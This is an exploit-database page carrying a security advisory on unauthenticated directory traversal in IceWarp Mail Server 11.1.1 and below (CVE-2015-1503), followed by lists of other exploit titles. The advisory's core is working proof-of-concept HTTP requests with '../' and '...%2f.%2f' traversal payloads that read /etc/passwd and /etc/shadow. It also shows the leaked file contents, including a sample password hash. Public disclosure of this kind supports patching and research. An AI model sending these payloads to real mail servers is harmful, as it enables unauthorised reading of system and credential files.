Menu

Search for hundreds of thousands of exploits

"IceWarp Mail Server < 11.1.1 - Directory Traversal"

Author

Exploit author

"Trustwave's SpiderLabs"

Platform

Exploit platform

php

Release date

Exploit published date

2018-05-04

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below

Product description: 
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.

Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.

Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd

Proof-of-Concept:

The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:

REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 

....TRUNCATED

test:x:1000:1000:test,,,:/home/test:/bin/bash 
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 

The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter.  Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.

REQUEST 1
=========

GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

REQUEST 2
=========

GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::

....TRUNCATED

lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Online Shopping Alphaware 1.0 - Error Based SQL injection" webapps php "Moaaz Taha"
Release Date Title Type Platform Author
2018-05-04 "IceWarp Mail Server < 11.1.1 - Directory Traversal" webapps php "Trustwave's SpiderLabs"
2017-01-30 "NETGEAR Routers - Password Disclosure" webapps hardware "Trustwave's SpiderLabs"
2015-08-27 "Oracle GlassFish Server 4.1 - Directory Traversal" webapps multiple "Trustwave's SpiderLabs"
2014-02-12 "Apache Commons FileUpload and Apache Tomcat - Denial of Service" dos multiple "Trustwave's SpiderLabs"
2014-02-11 "Tableau Server < 8.0.7 / < 8.1.2 - Blind SQL Injection" webapps windows "Trustwave's SpiderLabs"
2014-01-24 "Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2014-01-24 "Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow" remote windows "Trustwave's SpiderLabs"
2013-09-17 "Vino VNC Server 3.7.3 - Persistent Denial of Service" dos linux "Trustwave's SpiderLabs"
2013-09-10 "AjaXplorer 1.0 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2013-08-07 "McAfee SuperScan 4.0 - Cross-Site Scripting" webapps windows "Trustwave's SpiderLabs"
2013-08-02 "MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities" webapps hardware "Trustwave's SpiderLabs"
2013-08-02 "Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities" local hardware "Trustwave's SpiderLabs"
2013-08-02 "INSTEON Hub 2242-222 - Lack of Web and API Authentication" webapps hardware "Trustwave's SpiderLabs"
2013-01-16 "Oracle Application Framework - Diagnostic Mode Bypass" webapps jsp "Trustwave's SpiderLabs"
2012-10-24 "Bitweaver 2.8.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2012-04-19 "Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities" webapps multiple "Trustwave's SpiderLabs"
2012-01-25 "WordPress 3.3.1 - Multiple Vulnerabilities" webapps php "Trustwave's SpiderLabs"
2011-06-23 "IBM Web Application Firewall - Bypass" remote windows "Trustwave's SpiderLabs"
2011-02-06 "Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities" remote hardware "Trustwave's SpiderLabs"
2010-12-12 "Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Authentication Bypass" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Denial of Service" dos hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow" dos hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Undocumented Default Accounts" webapps hardware "Trustwave's SpiderLabs"
2010-11-13 "Camtron CMNC-200 IP Camera - Directory Traversal" remote hardware "Trustwave's SpiderLabs"
2010-09-24 "FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution" webapps php "Trustwave's SpiderLabs"
2010-08-03 "EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export" remote hardware "Trustwave's SpiderLabs"
2009-05-24 "Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting" remote hardware "Trustwave's SpiderLabs"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.